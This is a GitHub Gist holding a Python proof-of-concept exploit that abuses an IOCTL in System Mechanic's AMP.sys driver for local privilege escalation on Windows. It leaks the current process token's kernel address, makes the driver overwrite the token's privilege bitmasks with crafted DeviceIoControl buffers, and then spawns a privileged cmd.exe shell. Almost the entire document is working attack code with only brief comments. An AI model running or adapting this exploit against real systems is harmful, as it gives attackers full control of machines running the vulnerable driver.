Last active
November 25, 2021 07:33
-
-
Save alxbl/2fb9a0583c5b88db2b4d1a7f2ca5cdda to your computer and use it in GitHub Desktop.
WKE - Local Privilege Escalation using System Mechanics's AMP.sys driver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import random | |
import binascii | |
import struct | |
import os | |
from ctypes import * | |
from ctypes.wintypes import * | |
# Shorthands for some ctypes stuff. | |
kernel32 = windll.kernel32 | |
ntdll = windll.ntdll | |
psapi = windll.psapi | |
advapi32 = windll.advapi32 | |
OpenProcessToken = advapi32.OpenProcessToken | |
# Constants. | |
GENERIC_READ = 0x80000000 | |
GENERIC_WRITE = 0x40000000 | |
OPEN_EXISTING = 0x3 | |
STATUS_SUCCESS = 0 | |
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 | |
STATUS_INVALID_HANDLE = 0xC0000008 | |
TOKEN_QUERY = 8 | |
SystemExtendedHandleInformation = 64 | |
NTSTATUS = DWORD | |
PHANDLE = POINTER(HANDLE) | |
PVOID = LPVOID = ULONG_PTR = c_void_p | |
INVALID_HANDLE_VALUE = -1 | |
DEVICE_NAME = "\\\\.\\AMP" | |
# Function signature helpers. | |
ntdll.NtQuerySystemInformation.argtypes = [DWORD, PVOID, ULONG, POINTER(ULONG)] | |
ntdll.NtQuerySystemInformation.restype = NTSTATUS | |
advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)] | |
advapi32.OpenProcessToken.restype = BOOL | |
# IOCTL: 0x226033 -> CTL_CODE(FILE_DEVICE_UNKNOWN, 0x80C, METHOD_NEITHER, FILE_READ_ACCESS) | |
IOCTL_CODE = 0x226003 | |
# For fuzzing | |
BUFSZ = 0x100 | |
MAX_ITER = 0x10000 | |
# Structures for NtQuerySystemInformation. | |
class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): | |
_fields_ = [ | |
("Object", PVOID), | |
("UniqueProcessId", PVOID), | |
("HandleValue", PVOID), | |
("GrantedAccess", ULONG), | |
("CreatorBackTraceIndex", USHORT), | |
("ObjectTypeIndex", USHORT), | |
("HandleAttributes", ULONG), | |
("Reserved", ULONG), | |
] | |
class SYSTEM_HANDLE_INFORMATION_EX(Structure): | |
_fields_ = [ | |
("NumberOfHandles", PVOID), | |
("Reserved", PVOID), | |
("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), | |
] | |
def rand_buff(n): | |
"""Generate a buffer fillted with random bytes.""" | |
return ([random.randint(0x00,0xFF) for _ in range(n)]) | |
def open_fd(): | |
"""Opens the device driver.""" | |
device_handle = kernel32.CreateFileA(DEVICE_NAME, | |
GENERIC_READ | GENERIC_WRITE, | |
0, | |
None, | |
OPEN_EXISTING, | |
0, | |
None) | |
kernel32.CloseHandle(device_handle) # This avoids a weird bug where the device handle refuses to open in Python (!?) | |
handle = kernel32.CreateFileA(DEVICE_NAME, | |
GENERIC_READ | GENERIC_WRITE, | |
0, | |
None, | |
OPEN_EXISTING, | |
0, | |
None) | |
print('[+] Got Driver Handle: ' + str(handle)) | |
return handle | |
def close_handle(h): kernel32.CloseHandle(h) | |
def find_handles(pid, data): | |
""" | |
Parses the output of NtQuerySystemInformation to find handles associated | |
with the given PID. | |
""" | |
header = cast(data, POINTER(SYSTEM_HANDLE_INFORMATION_EX)) | |
nentries = header[0].NumberOfHandles | |
print('[+] Leaking access token address') | |
handles = [] | |
data = bytearray(data[16:]) | |
# Manually unpacking the struct because of issues with ctypes.parse | |
while nentries > 0: | |
p = data[:40] | |
e = struct.unpack('<QQQLHHLL', p) | |
nentries -= 1 | |
data = data[40:] | |
hpid = e[1] | |
handle = e[2] | |
if hpid != pid: continue | |
handles.append((e[1], e[0], e[2])) | |
return handles | |
def get_token_address(): | |
""" | |
Leverage userland APIs to leak the current process' token address in kernel | |
land. | |
""" | |
hProc = HANDLE(kernel32.GetCurrentProcess()) | |
pid = kernel32.GetCurrentProcessId() | |
print('[+] Current PID: ' + str(pid)) | |
h = HANDLE() | |
res = OpenProcessToken(hProc, TOKEN_QUERY, byref(h)) | |
if res == 0: | |
print('[-] Error getting token handle: ' + str(kernel32.GetLastError())) | |
else: | |
print('[+] Token Handle: ' + str(h.value)) | |
# Find the handles associated with the current process | |
q = STATUS_INFO_LENGTH_MISMATCH | |
out = DWORD(0) | |
sz = 0 | |
while q == STATUS_INFO_LENGTH_MISMATCH: | |
sz += 0x1000 | |
handle_info = (c_ubyte * sz)() | |
q = ntdll.NtQuerySystemInformation(SystemExtendedHandleInformation, byref(handle_info), sz, byref(out)) | |
# Parse handle_info to retrieve handles for the current PID | |
handles = find_handles(pid, handle_info) | |
hToken = filter(lambda x: x[0] == pid and x[2] == h.value, handles) | |
if len(hToken) != 1: | |
print('[-] Could not find access token address!') | |
return None | |
else: | |
pToken = hToken[0][1] | |
print('[+] Found token at ' + hex(pToken)) | |
return pToken | |
def exploit(h): | |
""" | |
Exploits the bug to escalate privileges. | |
Reminder: | |
0: kd> dt nt!_SEP_TOKEN_PRIVILEGES | |
+0x000 Present : Uint8B | |
+0x008 Enabled : Uint8B | |
+0x010 EnabledByDefault : Uint8B | |
""" | |
h = HANDLE(h) | |
result = DWORD() | |
token = get_token_address() | |
if token is None: sys.exit(-1) | |
PARAMS = ''.join([struct.pack('<Q', x) for x in [0, 0, 0, 0]]) | |
# NOTE: We add +1 to ensure that the low bytes are 0xff. | |
fid = struct.pack('<q', 0x8) # Function ID to call | |
args = struct.pack('<Q', id(PARAMS) + 32) # Pointer to argument buffer (gets read) | |
dst = struct.pack('<Q', token + 0x48 + 1) # Destination Buffer (gets written) | |
ENABLED = bytes(''.join([ fid, args, dst ])) | |
fid = struct.pack('<q', 0x8) # Function ID to call | |
args = struct.pack('<Q', id(PARAMS) + 32) # Pointer to argument buffer (gets read) | |
dst = struct.pack('<Q', token + 0x40 + 1) # Destination Buffer (gets written) | |
PRESENT = bytes(''.join([ fid, args, dst ])) | |
fid = struct.pack('<q', 0x8) # Function ID to call | |
args = struct.pack('<Q', id(PARAMS) + 32) # Pointer to argument buffer (gets read) | |
dst = struct.pack('<Q', token + 0x50 + 1) # Destination Buffer (gets written) | |
DEFAULT = bytes(''.join([ fid, args, dst ])) | |
print('[+] Writing _SEP_TOKEN_PRIVILEGES.Enabled') | |
res = kernel32.DeviceIoControl(h, IOCTL_CODE, ENABLED, len(ENABLED), 0, 0, byref(result), None) | |
print('[+] Writing _SEP_TOKEN_PRIVILEGES.Present') | |
res = kernel32.DeviceIoControl(h, IOCTL_CODE, PRESENT, len(PRESENT), 0, 0, byref(result), None) | |
print('[+] Writing _SEP_TOKEN_PRIVILEGES.Default') | |
res = kernel32.DeviceIoControl(h, IOCTL_CODE, DEFAULT, len(DEFAULT), 0, 0, byref(result), None) | |
if res == 0: | |
err = kernel32.GetLastError() | |
print('[!] IOCTL Failure. Result: ' + hex(err)) | |
sys.exit(-1) | |
print('[+] All done! Spawning a privileged shell.') | |
print('[+] Check your privileges: !token %x' % (token)) | |
os.system('cmd.exe') | |
if __name__ == "__main__": | |
h = open_fd() | |
exploit(h) | |
close_handle(h) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment